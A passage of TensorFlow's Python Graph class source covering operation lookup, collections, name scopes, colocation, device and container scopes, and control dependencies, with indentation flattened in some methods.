A list of Operations.
"""
if self._finalized:
return list(self._nodes_by_id.values())
with self._lock:
return list(self._nodes_by_id.values())
def get_operation_by_name(self, name):
"""Returns the `Operation` with the given `name`.
This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to an operation in this graph.
"""
if not isinstance(name, six.string_types):
raise TypeError("Operation names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=False, allow_operation=True)
def _get_operation_by_name_unsafe(self, name):
"""Returns the `Operation` with the given `name`.
This is a internal unsafe version of get_operation_by_name. It skips many
checks and does not have user friedly error messages but runs considerably
faster. This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
KeyError: If `name` does not correspond to an operation in this graph.
"""
if self._finalized:
return self._nodes_by_name[name]
with self._lock:
return self._nodes_by_name[name]
def _get_operation_by_tf_operation(self, tf_oper):
op_name = c_api.TF_OperationName(tf_oper)
return self._get_operation_by_name_unsafe(op_name)
def get_tensor_by_name(self, name):
"""Returns the `Tensor` with the given `name`.
This method may be called concurrently from multiple threads.
Args:
name: The name of the `Tensor` to return.
Returns:
The `Tensor` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to a tensor in this graph.
"""
# Names should be strings.
if not isinstance(name, six.string_types):
raise TypeError("Tensor names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=True, allow_operation=False)
def _get_tensor_by_tf_output(self, tf_output):
"""Returns the `Tensor` representing `tf_output`.
Note that there is only one such `Tensor`, i.e. multiple calls to this
function with the same TF_Output value will always return the same `Tensor`
object.
Args:
tf_output: A wrapped `TF_Output` (the C API equivalent of `Tensor`).
Returns:
The `Tensor` that represents `tf_output`.
"""
op = self._get_operation_by_tf_operation(tf_output.oper)
return op.outputs[tf_output.index]
def _next_id(self):
"""Id for next Operation instance. Also increments the internal id."""
self._check_not_finalized()
with self._lock:
self._next_id_counter += 1
return self._next_id_counter
  @property
  def _last_id(self):
    """Returns the id most recently handed out by `_next_id` (read-only)."""
    return self._next_id_counter
def _get_op_def(self, type): # pylint: disable=redefined-builtin
"""Returns the `OpDef` proto for `type`. `type` is a string."""
# NOTE: No locking is required because the lookup and insertion operations
# on Python dictionaries are atomic.
try:
return self._op_def_cache[type]
except KeyError:
with c_api_util.tf_buffer() as buf:
# pylint: disable=protected-access
c_api.TF_GraphGetOpDef(self._c_graph, compat.as_bytes(type), buf)
# pylint: enable=protected-access
data = c_api.TF_GetBuffer(buf)
op_def = op_def_pb2.OpDef()
op_def.ParseFromString(compat.as_bytes(data))
self._op_def_cache[type] = op_def
return op_def
def as_default(self):
"""Returns a context manager that makes this `Graph` the default graph.
This method should be used if you want to create multiple graphs
in the same process. For convenience, a global default graph is
provided, and all ops will be added to this graph if you do not
create a new graph explicitly.
Use this method with the `with` keyword to specify that ops created within
the scope of a block should be added to this graph. In this case, once
the scope of the `with` is exited, the previous default graph is set again
as default. There is a stack, so it's ok to have multiple nested levels
of `as_default` calls.
The default graph is a property of the current thread. If you
create a new thread, and wish to use the default graph in that
thread, you must explicitly add a `with g.as_default():` in that
thread's function.
The following code examples are equivalent:
```python
# 1. Using Graph.as_default():
g = tf.Graph()
with g.as_default():
c = tf.constant(5.0)
assert c.graph is g
# 2. Constructing and making default:
with tf.Graph().as_default() as g:
c = tf.constant(5.0)
assert c.graph is g
```
If eager execution is enabled ops created under this context manager will be
added to the graph instead of executed eagerly.
Returns:
A context manager for using this graph as the default graph.
"""
return _default_graph_stack.get_controller(self)
@property
def collections(self):
"""Returns the names of the collections known to this graph."""
return list(self._collections)
def add_to_collection(self, name, value):
"""Stores `value` in the collection with the given `name`.
Note that collections are not sets, so it is possible to add a value to
a collection several times.
Args:
name: The key for the collection. The `GraphKeys` class contains many
standard names for collections.
value: The value to add to the collection.
""" # pylint: disable=g-doc-exception
self._check_not_finalized()
with self._lock:
if name not in self._collections:
self._collections[name] = [value]
else:
self._collections[name].append(value)
def add_to_collections(self, names, value):
"""Stores `value` in the collections given by `names`.
Note that collections are not sets, so it is possible to add a value to
a collection several times. This function makes sure that duplicates in
`names` are ignored, but it will not check for pre-existing membership of
`value` in any of the collections in `names`.
`names` can be any iterable, but if `names` is a string, it is treated as a
single collection name.
Args:
names: The keys for the collections to add to. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collections.
"""
# Make sure names are unique, but treat strings as a single collection name
names = (names,) if isinstance(names, six.string_types) else set(names)
for name in names:
self.add_to_collection(name, value)
def get_collection_ref(self, name):
"""Returns a list of values in the collection with the given `name`.
If the collection exists, this returns the list itself, which can
be modified in place to change the collection. If the collection does
not exist, it is created as an empty list and the list is returned.
This is different from `get_collection()` which always returns a copy of
the collection list if it exists and never creates an empty collection.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
Returns:
The list of values in the collection with the given `name`, or an empty
list if no value has been added to that collection.
""" # pylint: disable=g-doc-exception
with self._lock:
coll_list = self._collections.get(name, None)
if coll_list is None:
coll_list = []
self._collections[name] = coll_list
return coll_list
def get_collection(self, name, scope=None):
"""Returns a list of values in the collection with the given `name`.
This is different from `get_collection_ref()` which always returns the
actual collection list if it exists in that it returns a new list each time
it is called.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
scope: (Optional.) A string. If supplied, the resulting list is filtered
to include only items whose `name` attribute matches `scope` using
`re.match`. Items without a `name` attribute are never returned if a
scope is supplied. The choice of `re.match` means that a `scope` without
special tokens filters by prefix.
Returns:
The list of values in the collection with the given `name`, or
an empty list if no value has been added to that collection. The
list contains the values in the order under which they were
collected.
""" # pylint: disable=g-doc-exception
with self._lock:
collection = self._collections.get(name, None)
if collection is None:
return []
if scope is None:
return list(collection)
else:
c = []
regex = re.compile(scope)
for item in collection:
try:
if regex.match(item.name):
c.append(item)
except AttributeError:
# Collection items with no name are ignored.
pass
return c
def get_all_collection_keys(self):
"""Returns a list of collections used in this graph."""
with self._lock:
return [x for x in self._collections if isinstance(x, six.string_types)]
def clear_collection(self, name):
"""Clears all values in a collection.
Args:
name: The key for the collection. The `GraphKeys` class contains many
standard names for collections.
"""
self._check_not_finalized()
with self._lock:
if name in self._collections:
del self._collections[name]
@tf_contextlib.contextmanager
def _original_op(self, op):
"""Python 'with' handler to help annotate ops with their originator.
An op may have an 'original_op' property that indicates the op on which
it was based. For example a replica op is based on the op that was
replicated and a gradient op is based on the op that was differentiated.
All ops created in the scope of this 'with' handler will have
the given 'op' as their original op.
Args:
op: The Operation that all ops created in this scope will have as their
original op.
Yields:
Nothing.
"""
old_original_op = self._default_original_op
self._default_original_op = op
try:
yield
finally:
self._default_original_op = old_original_op
  @property
  def _name_stack(self):
    """Thread-local current name scope, e.g. "outer/inner" ("" at the root)."""
    # This may be called from a thread where name_stack doesn't yet exist.
    if not hasattr(self._thread_local, "_name_stack"):
      self._thread_local._name_stack = ""
    return self._thread_local._name_stack
  @_name_stack.setter
  def _name_stack(self, name_stack):
    # Each thread maintains its own name stack; the setter writes only the
    # calling thread's copy.
    self._thread_local._name_stack = name_stack
  # pylint: disable=g-doc-return-or-yield,line-too-long
  @tf_contextlib.contextmanager
  def name_scope(self, name):
    """Returns a context manager that creates hierarchical names for operations.

    A graph maintains a stack of name scopes. A `with name_scope(...):`
    statement pushes a new name onto the stack for the lifetime of the context.

    The `name` argument will be interpreted as follows:

    * A string (not ending with '/') will create a new name scope, in which
      `name` is appended to the prefix of all operations created in the
      context. If `name` has been used before, it will be made unique by
      calling `self.unique_name(name)`.
    * A scope previously captured from a `with g.name_scope(...) as
      scope:` statement will be treated as an "absolute" name scope, which
      makes it possible to re-enter existing scopes.
    * A value of `None` or the empty string will reset the current name scope
      to the top-level (empty) name scope.

    For example:

    ```python
    with tf.Graph().as_default() as g:
      c = tf.constant(5.0, name="c")
      assert c.op.name == "c"
      c_1 = tf.constant(6.0, name="c")
      assert c_1.op.name == "c_1"

      # Creates a scope called "nested"
      with g.name_scope("nested") as scope:
        nested_c = tf.constant(10.0, name="c")
        assert nested_c.op.name == "nested/c"

        # Creates a nested scope called "inner".
        with g.name_scope("inner"):
          nested_inner_c = tf.constant(20.0, name="c")
          assert nested_inner_c.op.name == "nested/inner/c"

        # Create a nested scope called "inner_1".
        with g.name_scope("inner"):
          nested_inner_1_c = tf.constant(30.0, name="c")
          assert nested_inner_1_c.op.name == "nested/inner_1/c"

          # Treats `scope` as an absolute name scope, and
          # switches to the "nested/" scope.
          with g.name_scope(scope):
            nested_d = tf.constant(40.0, name="d")
            assert nested_d.op.name == "nested/d"

            with g.name_scope(""):
              e = tf.constant(50.0, name="e")
              assert e.op.name == "e"
    ```

    The name of the scope itself can be captured by `with
    g.name_scope(...) as scope:`, which stores the name of the scope
    in the variable `scope`. This value can be used to name an
    operation that represents the overall result of executing the ops
    in a scope. For example:

    ```python
    inputs = tf.constant(...)
    with g.name_scope('my_layer') as scope:
      weights = tf.Variable(..., name="weights")
      biases = tf.Variable(..., name="biases")
      affine = tf.matmul(inputs, weights) + biases
      output = tf.nn.relu(affine, name=scope)
    ```

    NOTE: This constructor validates the given `name`. Valid scope
    names match one of the following regular expressions:

        [A-Za-z0-9.][A-Za-z0-9_.\\-/]* (for scopes at the root)
        [A-Za-z0-9_.\\-/]* (for other scopes)

    Args:
      name: A name for the scope.

    Returns:
      A context manager that installs `name` as a new name scope.

    Raises:
      ValueError: If `name` is not a valid scope name, according to the rules
        above.
    """
    if name:
      if isinstance(name, compat.bytes_or_text_types):
        name = compat.as_str(name)
      if self._name_stack:
        # Scopes created in a nested scope may have initial characters
        # that are illegal as the initial character of an op name
        # (viz. '-', '\', '/', and '_').
        if not _VALID_SCOPE_NAME_REGEX.match(name):
          raise ValueError("'%s' is not a valid scope name" % name)
      else:
        # Scopes created in the root must match the more restrictive
        # op name regex, which constrains the initial character.
        if not _VALID_OP_NAME_REGEX.match(name):
          raise ValueError("'%s' is not a valid scope name" % name)
    old_stack = self._name_stack
    if not name:  # Both for name=None and name="" we re-set to empty scope.
      new_stack = None
    elif name[-1] == "/":
      # A trailing "/" marks a previously captured scope: re-enter it
      # verbatim rather than uniquifying it.
      new_stack = name_from_scope_name(name)
    else:
      new_stack = self.unique_name(name)
    self._name_stack = new_stack
    try:
      yield "" if new_stack is None else new_stack + "/"
    finally:
      # Restore the caller's scope even if the body raised.
      self._name_stack = old_stack
  # pylint: enable=g-doc-return-or-yield,line-too-long
  def unique_name(self, name, mark_as_used=True):
    """Return a unique operation name for `name`.

    Note: You rarely need to call `unique_name()` directly. Most of
    the time you just need to create `with g.name_scope()` blocks to
    generate structured names.

    `unique_name` is used to generate structured names, separated by
    `"/"`, to help identify operations when debugging a graph.
    Operation names are displayed in error messages reported by the
    TensorFlow runtime, and in various visualization tools such as
    TensorBoard.

    If `mark_as_used` is set to `True`, which is the default, a new
    unique name is created and marked as in use. If it's set to `False`,
    the unique name is returned without actually being marked as used.
    This is useful when the caller simply wants to know what the name
    to be created will be.

    Args:
      name: The name for an operation.
      mark_as_used: Whether to mark this name as being used.

    Returns:
      A string to be passed to `create_op()` that will be used
      to name the operation being created.
    """
    # Prefix with the current (thread-local) name scope, if any.
    if self._name_stack:
      name = self._name_stack + "/" + name
    # For the sake of checking for names in use, we treat names as case
    # insensitive (e.g. foo = Foo).
    name_key = name.lower()
    i = self._names_in_use.get(name_key, 0)
    # Increment the number for "name_key".
    if mark_as_used:
      self._names_in_use[name_key] = i + 1
    if i > 0:
      base_name_key = name_key
      # Make sure the composed name key is not already used.
      while name_key in self._names_in_use:
        name_key = "%s_%d" % (base_name_key, i)
        i += 1
      # Mark the composed name_key as used in case someone wants
      # to call unique_name("name_1").
      if mark_as_used:
        self._names_in_use[name_key] = 1
      # Return the new name with the original capitalization of the given name.
      name = "%s_%d" % (name, i - 1)
    return name
def get_name_scope(self):
"""Returns the current name scope.
For example:
```python
with tf.name_scope('scope1'):
with tf.name_scope('scope2'):
print(tf.compat.v1.get_default_graph().get_name_scope())
```
would print the string `scope1/scope2`.
Returns:
A string representing the current name scope.
"""
return self._name_stack
  @tf_contextlib.contextmanager
  def _colocate_with_for_gradient(self, op, gradient_uid,
                                  ignore_existing=False):
    """Like `colocate_with`, but also informs the control flow context.

    When a gradient uid is supplied and a control flow context is active, the
    context is told to enter (and, on exit, leave) gradient colocation for
    `op`, nested inside the ordinary colocation scope.
    """
    with self.colocate_with(op, ignore_existing):
      if gradient_uid is not None and self._control_flow_context is not None:
        self._control_flow_context.EnterGradientColocation(op, gradient_uid)
        try:
          yield
        finally:
          # Always balance the Enter above, even if the body raised.
          self._control_flow_context.ExitGradientColocation(op, gradient_uid)
      else:
        yield
  @tf_contextlib.contextmanager
  def colocate_with(self, op, ignore_existing=False):
    """Returns a context manager that specifies an op to colocate with.

    Note: this function is not for public use, only for internal libraries.

    For example:

    ```python
    a = tf.Variable([1.0])
    with g.colocate_with(a):
      b = tf.constant(1.0)
      c = tf.add(a, b)
    ```

    `b` and `c` will always be colocated with `a`, no matter where `a`
    is eventually placed.

    **NOTE** Using a colocation scope resets any existing device constraints.

    If `op` is `None` then `ignore_existing` must be `True` and the new
    scope resets all colocation and device constraints.

    Args:
      op: The op to colocate all created ops with, or `None`.
      ignore_existing: If true, only applies colocation of this op within the
        context, rather than applying all colocation properties on the stack.
        If `op` is `None`, this value must be `True`.

    Raises:
      ValueError: if op is None but ignore_existing is False.

    Yields:
      A context manager that specifies the op with which to colocate
      newly created ops.
    """
    if op is None and not ignore_existing:
      raise ValueError("Trying to reset colocation (op is None) but "
                       "ignore_existing is not True")
    op = _op_to_colocate_with(op, self)
    # By default, colocate_with resets the device function stack,
    # since colocate_with is typically used in specific internal
    # library functions where colocation is intended to be "stronger"
    # than device functions.
    #
    # In the future, a caller may specify that device_functions win
    # over colocation, in which case we can add support.
    device_fn_tmp = self._device_function_stack
    self._device_function_stack = traceable_stack.TraceableStack()
    if ignore_existing:
      # Save the whole colocation stack; restored in the finally block.
      current_stack = self._colocation_stack
      self._colocation_stack = traceable_stack.TraceableStack()
    if op is not None:
      # offset refers to the stack frame used for storing code location.
      # We use 4, the sum of 1 to use our caller's stack frame and 3
      # to jump over layers of context managers above us.
      self._colocation_stack.push_obj(op, offset=4)
    try:
      yield
    finally:
      # Restore device function stack
      self._device_function_stack = device_fn_tmp
      if op is not None:
        self._colocation_stack.pop_obj()
      # Reset the colocation stack if requested.
      if ignore_existing:
        self._colocation_stack = current_stack
def _add_device_to_stack(self, device_name_or_function, offset=0):
"""Add device to stack manually, separate from a context manager."""
total_offset = 1 + offset
spec = _UserDeviceSpec(device_name_or_function)
self._device_function_stack.push_obj(spec, offset=total_offset)
return spec
  @tf_contextlib.contextmanager
  def device(self, device_name_or_function):
    # pylint: disable=line-too-long
    """Returns a context manager that specifies the default device to use.

    The `device_name_or_function` argument may either be a device name
    string, a device function, or None:

    * If it is a device name string, all operations constructed in
      this context will be assigned to the device with that name, unless
      overridden by a nested `device()` context.
    * If it is a function, it will be treated as a function from
      Operation objects to device name strings, and invoked each time
      a new Operation is created. The Operation will be assigned to
      the device with the returned name.
    * If it is None, all `device()` invocations from the enclosing context
      will be ignored.

    For information about the valid syntax of device name strings, see
    the documentation in
    [`DeviceNameUtils`](https://www.tensorflow.org/code/tensorflow/core/util/device_name_utils.h).

    For example:

    ```python
    with g.device('/device:GPU:0'):
      # All operations constructed in this context will be placed
      # on GPU 0.
      with g.device(None):
        # All operations constructed in this context will have no
        # assigned device.

    # Defines a function from `Operation` to device string.
    def matmul_on_gpu(n):
      if n.type == "MatMul":
        return "/device:GPU:0"
      else:
        return "/cpu:0"

    with g.device(matmul_on_gpu):
      # All operations of type "MatMul" constructed in this context
      # will be placed on GPU 0; all other operations will be placed
      # on CPU 0.
    ```

    **N.B.** The device scope may be overridden by op wrappers or
    other library code. For example, a variable assignment op
    `v.assign()` must be colocated with the `tf.Variable` `v`, and
    incompatible device scopes will be ignored.

    Args:
      device_name_or_function: The device name or function to use in the
        context.

    Yields:
      A context manager that specifies the default device to use for newly
      created ops.

    Raises:
      RuntimeError: If device scopes are not properly nested.
    """
    self._add_device_to_stack(device_name_or_function, offset=2)
    # Remember the entry we pushed so we can verify proper nesting on exit.
    old_top_of_stack = self._device_function_stack.peek_top_obj()
    try:
      yield
    finally:
      # If the top of the stack changed, a nested device scope leaked out of
      # its block, which would corrupt the stack if we popped blindly.
      new_top_of_stack = self._device_function_stack.peek_top_obj()
      if old_top_of_stack is not new_top_of_stack:
        raise RuntimeError("Exiting device scope without proper scope nesting.")
      self._device_function_stack.pop_obj()
  def _apply_device_functions(self, op):
    """Applies the current device function stack to the given operation."""
    # Apply any device functions in LIFO order, so that the most recently
    # pushed function has the first chance to apply a device to the op.
    # We apply here because the result can depend on the Operation's
    # signature, which is computed in the Operation constructor.
    # pylint: disable=protected-access
    prior_device_string = None
    for device_spec in self._device_function_stack.peek_objs():
      # Specs that merge nothing can be skipped entirely.
      if device_spec.is_null_merge:
        continue
      # A spec with no function terminates the walk down the stack.
      if device_spec.function is None:
        break
      device_string = device_spec.string_merge(op)
      # Take advantage of the fact that None is a singleton and Python interns
      # strings, since identity checks are faster than equality checks.
      if device_string is not prior_device_string:
        op._set_device_from_string(device_string)
        prior_device_string = device_string
    op._device_code_locations = self._snapshot_device_function_stack_metadata()
    # pylint: enable=protected-access
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def container(self, container_name):
"""Returns a context manager that specifies the resource container to use.
Stateful operations, such as variables and queues, can maintain their
states on devices so that they can be shared by multiple processes.
A resource container is a string name under which these stateful
operations are tracked. These resources can be released or cleared
with `tf.Session.reset()`.
For example:
```python
with g.container('experiment0'):
# All stateful Operations constructed in this context will be placed
# in resource container "experiment0".
v1 = tf.Variable([1.0])
v2 = tf.Variable([2.0])
with g.container("experiment1"):
# All stateful Operations constructed in this context will be
# placed in resource container "experiment1".
v3 = tf.Variable([3.0])
q1 = tf.queue.FIFOQueue(10, tf.float32)
# All stateful Operations constructed in this context will be
# be created in the "experiment0".
v4 = tf.Variable([4.0])
q1 = tf.queue.FIFOQueue(20, tf.float32)
with g.container(""):
# All stateful Operations constructed in this context will be
# be placed in the default resource container.
v5 = tf.Variable([5.0])
q3 = tf.queue.FIFOQueue(30, tf.float32)
# Resets container "experiment0", after which the state of v1, v2, v4, q1
# will become undefined (such as uninitialized).
tf.Session.reset(target, ["experiment0"])
```
Args:
container_name: container name string.
Returns:
A context manager for defining resource containers for stateful ops,
yields the container name.
"""
original_container = self._container
self._container = container_name
try:
yield self._container
finally:
self._container = original_container
# pylint: enable=g-doc-return-or-yield
class _ControlDependenciesController(object):
"""Context manager for `control_dependencies()`."""
def __init__(self, graph, control_inputs):
"""Create a new `_ControlDependenciesController`.
A `_ControlDependenciesController` is the context manager for
`with tf.control_dependencies()` blocks. These normally nest,
as described in the documentation for `control_dependencies()`.
The `control_inputs` argument list control dependencies that must be
added to the current set of control dependencies. Because of
uniquification the set can be empty even if the caller passed a list of
ops. The special value `None` indicates that we want to start a new
empty set of control dependencies instead of extending the current set.
In that case we also clear the current control flow context, which is an
additional mechanism to add control dependencies.
Args:
graph: The graph that this controller is managing.
control_inputs: List of ops to use as control inputs in addition to the
current control dependencies. None to indicate that the dependencies
should be cleared.
"""
self._graph = graph
if control_inputs is None:
self._control_inputs_val = []
self._new_stack = True
else:
self._control_inputs_val = control_inputs
self._new_stack = False
self._seen_nodes = set()
self._old_stack = None
self._old_control_flow_context = None
# pylint: disable=protected-access
def __enter__(self):
if self._new_stack:
# Clear the control_dependencies graph.
self._old_stack = self._graph._control_dependencies_stack
self._graph._control_dependencies_stack = []
# Clear the control_flow_context too.
self._old_control_flow_context = self._graph._get_control_flow_context()
self._graph._set_control_flow_context(None)
self._graph._push_control_dependencies_controller(self)
def __exit__(self, unused_type, unused_value, unused_traceback):
self._graph._pop_control_dependencies_controller(self)
if self._new_stack:
self._graph._control_dependencies_stack = self._old_stack
self._graph._set_control_flow_context(self._old_control_flow_context)
# pylint: enable=protected-access
@property
def control_inputs(self):
return self._control_inputs_val
def add_op(self, op):
if isinstance(op, Tensor):
op = op.experimental_ref()
self._seen_nodes.add(op)
def op_in_group(self, op):
if isinstance(op, Tensor):
op = op.experimental_ref()
return op in self._seen_nodes
  def _push_control_dependencies_controller(self, controller):
    # Activate `controller`: ops created from now on pick up its inputs.
    self._control_dependencies_stack.append(controller)
  def _pop_control_dependencies_controller(self, controller):
    # Controllers must nest strictly (LIFO): the controller leaving scope has
    # to be the innermost active one.
    assert self._control_dependencies_stack[-1] is controller
    self._control_dependencies_stack.pop()
def _current_control_dependencies(self):
ret = set()
for controller in self._control_dependencies_stack:
for op in controller.control_inputs:
ret.add(op)
return ret
def _control_dependencies_for_inputs(self, input_ops):
"""For an op that takes `input_ops` as inputs, compute control inputs.
The returned control dependencies should yield an execution that
is equivalent to adding all control inputs in
self._control_dependencies_stack to a newly created op. However,
this function attempts to prune the returned control dependencies
by observing that nodes created within the same `with
control_dependencies(...):` block may have data dependencies that make
the explicit approach redundant.
Args:
input_ops: The data input ops for an op to be created.
Returns:
A list of control inputs for the op to be created.
"""
ret = []
for controller in self._control_dependencies_stack:
# If any of the input_ops already depends on the inputs from controller,
# we say that the new op is dominated (by that input), and we therefore
# do not need to add control dependencies for this controller's inputs.
dominated = False
for op in input_ops:
if controller.op_in_group(op):
dominated = True
break
if not dominated:
# Don't add a control input if we already have a data dependency on i.
# NOTE(mrry): We do not currently track transitive data dependencies,
# so we may add redundant control inputs.
ret.extend([c for c in controller.control_inputs if c not in input_ops])
return ret
def _record_op_seen_by_control_dependencies(self, op):
"""Record that the given op depends on all registered control dependencies.
Args:
op: An Operation.
"""
for controller in self._control_dependencies_stack:
controller.add_op(op)
  def control_dependencies(self, control_inputs):
    """Returns a context manager that specifies control dependencies.

    Use with the `with` keyword to specify that all operations constructed
    within the context should have control dependencies on
    `control_inputs`. For example:

    ```python
    with g.control_dependencies([a, b, c]):
      # `d` and `e` will only run after `a`, `b`, and `c` have executed.
      d = ...
      e = ...
    ```

    Multiple calls to `control_dependencies()` can be nested, and in
    that case a new `Operation` will have control dependencies on the union
    of `control_inputs` from all active contexts.

    ```python
    with g.control_dependencies([a, b]):
      # Ops constructed here run after `a` and `b`.
      with g.control_dependencies([c, d]):
        # Ops constructed here run after `a`, `b`, `c`, and `d`.
    ```

    You can pass None to clear the control dependencies:

    ```python
    with g.control_dependencies([a, b]):
      # Ops constructed here run after `a` and `b`.
      with g.control_dependencies(None):
        # Ops constructed here run normally, not waiting for either `a` or `b`.
        with g.control_dependencies([c, d]):
          # Ops constructed here run after `c` and `d`, also not waiting
          # for either `a` or `b`.
    ```

    *N.B.* The control dependencies context applies *only* to ops that
    are constructed within the context. Merely using an op or tensor
    in the context does not add a control dependency. The following
    example illustrates this point:

    ```python
    # WRONG
    def my_func(pred, tensor):
      t = tf.matmul(tensor, tensor)
      with tf.control_dependencies([pred]):
        # The matmul op is created outside the context, so no control
        # dependency will be added.
        return t

    # RIGHT
    def my_func(pred, tensor):
      with tf.control_dependencies([pred]):
        # The matmul op is created in the context, so a control dependency
        # will be added.
        return tf.matmul(tensor, tensor)
    ```

    Also note that though execution of ops created under this scope will trigger
    execution of the dependencies, the ops created under this scope might still
    be pruned from a normal tensorflow graph. For example, in the following
    snippet of code the dependencies are never executed:

    ```python
    loss = model.loss()
    with tf.control_dependencies(dependencies):
      loss = loss + tf.constant(1)  # note: dependencies ignored in the
                                    # backward pass
    return tf.gradients(loss, model.variables)
    ```

    This is because evaluating the gradient graph does not require evaluating
    the constant(1) op created in the forward pass.

    Args:
      control_inputs: A list of `Operation` or `Tensor` objects which must be
        executed or computed before running the operations defined in the
        context. Can also be `None` to clear the control dependencies.

    Returns:
      A context manager that specifies control dependencies for all
      operations constructed within the context.

    Raises:
      TypeError: If `control_inputs` is not a list of `Operation` or
        `Tensor` objects.
    """
    # A `None` controller clears all active control dependencies for ops
    # created inside the returned context.
    if control_inputs is None:
      return self._ControlDependenciesController(self, None)
    # First convert the inputs to ops, and deduplicate them.
    # NOTE(mrry): Other than deduplication, we do not currently track direct
    # or indirect dependencies between control_inputs, which may result in
    # redundant control inputs.
    control_ops = []
    # `current` starts as the union of deps already guaranteed by enclosing
    # contexts; anything in it is skipped, and accepted ops are added so that
    # duplicates within `control_inputs` itself are also dropped.
    current = self._current_control_dependencies()
    for c in control_inputs:
      # The hasattr(handle) is designed to match ResourceVariables. This is so
      # control dependencies on a variable or on an unread variable don't
      # trigger reads.
      if (isinstance(c, IndexedSlices) or
          (hasattr(c, "_handle") and hasattr(c, "op"))):
        c = c.op
      c = self.as_graph_element(c)
      if isinstance(c, Tensor):
        c = c.op
      elif not isinstance(c, Operation):
        raise TypeError("Control input must be Operation or Tensor: %s" % c)
      if c not in current:
        control_ops.append(c)
        current.add(c)
    return self._ControlDependenciesController(self, control_ops)
  # pylint: disable=g-doc-return-or-yield
  @tf_contextlib.contextmanager
  def _attr_scope(self, attr_map):
    """EXPERIMENTAL: A context manager for setting attributes on operators.

    This context manager can be used to add additional
    attributes to operators within the scope of the context.

    For example:

       with ops.Graph().as_default() as g:
         f_1 = Foo()  # No extra attributes
         with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=False)}):
           f_2 = Foo()  # Additional attribute _a=False
           with g._attr_scope({"_a": tf.attr_value_pb2.AttrValue(b=True)}):
             f_3 = Foo()  # Additional attribute _a=True
             with g._attr_scope({"_a": None}):
               f_4 = Foo()  # No additional attributes.

    Args:
      attr_map: A dictionary mapping attr name strings to AttrValue protocol
        buffers or None.

    Returns:
      A context manager that sets the kernel label to be used for one or more
      ops created in that context.

    Raises:
      TypeError: If attr_map is not a dictionary mapping
        strings to AttrValue protobufs.
    """
    if not isinstance(attr_map, dict):
      raise TypeError("attr_map must be a dictionary mapping "
                      "strings to AttrValue protocol buffers")
    # The saved_attrs dictionary stores any currently-set labels that
    # will be overridden by this context manager.
    saved_attrs = {}
    # Install the given attribute
    for name, attr in attr_map.items():
      # NOTE: besides None and AttrValue protos, callables that emit AttrValue
      # protos are also accepted (checked below), although the docstring above
      # only mentions protos and None.
      if not (isinstance(name, six.string_types) and
              (isinstance(attr, (type(None), attr_value_pb2.AttrValue)) or
               callable(attr))):
        raise TypeError("attr_map must be a dictionary mapping "
                        "strings to AttrValue protocol buffers or "
                        "callables that emit AttrValue protocol buffers")
      try:
        saved_attrs[name] = self._attr_scope_map[name]
      except KeyError:
        pass
      # Mapping a name to None removes any attribute for that name.
      if attr is None:
        del self._attr_scope_map[name]
      else:
        self._attr_scope_map[name] = attr
    try:
      yield  # The code within the context runs here.
    finally:
      # Remove the attributes set for this context, and restore any saved
      # attributes.
      for name, attr in attr_map.items():
        try:
          self._attr_scope_map[name] = saved_attrs[name]
        except KeyError:
          del self._attr_scope_map[name]
  # pylint: enable=g-doc-return-or-yield
  # pylint: disable=g-doc-return-or-yield
  @tf_contextlib.contextmanager
  def _kernel_label_map(self, op_to_kernel_label_map):
    """EXPERIMENTAL: A context manager for setting kernel labels.

    This context manager can be used to select particular
    implementations of kernels within the scope of the context.

    For example:

        with ops.Graph().as_default() as g:
          f_1 = Foo()  # Uses the default registered kernel for the Foo op.
          with g.kernel_label_map({"Foo": "v_2"}):
            f_2 = Foo()  # Uses the registered kernel with label "v_2"
                         # for the Foo op.
            with g.kernel_label_map({"Foo": "v_3"}):
              f_3 = Foo()  # Uses the registered kernel with label "v_3"
                           # for the Foo op.
              with g.kernel_label_map({"Foo": ""}):
                f_4 = Foo()  # Uses the default registered kernel
                             # for the Foo op.

    Args:
      op_to_kernel_label_map: A dictionary mapping op type strings to kernel
        label strings.

    Returns:
      A context manager that sets the kernel label to be used for one or more
      ops created in that context.

    Raises:
      TypeError: If op_to_kernel_label_map is not a dictionary mapping
        strings to strings.
    """
    if not isinstance(op_to_kernel_label_map, dict):
      raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
                      "strings to strings")
    # The saved_labels dictionary stores any currently-set labels that
    # will be overridden by this context manager.
    saved_labels = {}
    # Install the given label
    for op_type, label in op_to_kernel_label_map.items():
      if not (isinstance(op_type, six.string_types) and
              isinstance(label, six.string_types)):
        raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
                        "strings to strings")
      try:
        saved_labels[op_type] = self._op_to_kernel_label_map[op_type]
      except KeyError:
        pass
      self._op_to_kernel_label_map[op_type] = label
    try:
      yield  # The code within the context runs here.
    finally:
      # Remove the labels set for this context, and restore any saved labels.
      for op_type, label in op_to_kernel_label_map.items():
        try:
          self._op_to_kernel_label_map[op_type] = saved_labels[op_type]
        except KeyError:
          del self._op_to_kernel_label_map[op_type]
  # pylint: enable=g-doc-return-or-yield
  # pylint: disable=g-doc-return-or-yield
  @tf_contextlib.contextmanager
  def gradient_override_map(self, op_type_map):
    """EXPERIMENTAL: A context manager for overriding gradient functions.

    This context manager can be used to override the gradient function
    that will be used for ops within the scope of the context.

    For example:

    ```python
    @tf.RegisterGradient("CustomSquare")
    def _custom_square_grad(op, grad):
      # ...

    with tf.Graph().as_default() as g:
      c = tf.constant(5.0)
      s_1 = tf.square(c)  # Uses the default gradient for tf.square.
      with g.gradient_override_map({"Square": "CustomSquare"}):
        s_2 = tf.square(c)  # Uses _custom_square_grad to compute the
                            # gradient of s_2.
    ```

    Args:
      op_type_map: A dictionary mapping op type strings to alternative op type
        strings.

    Returns:
      A context manager that sets the alternative op type to be used for one
      or more ops created in that context.

    Raises:
      TypeError: If `op_type_map` is not a dictionary mapping strings to
        strings.
    """
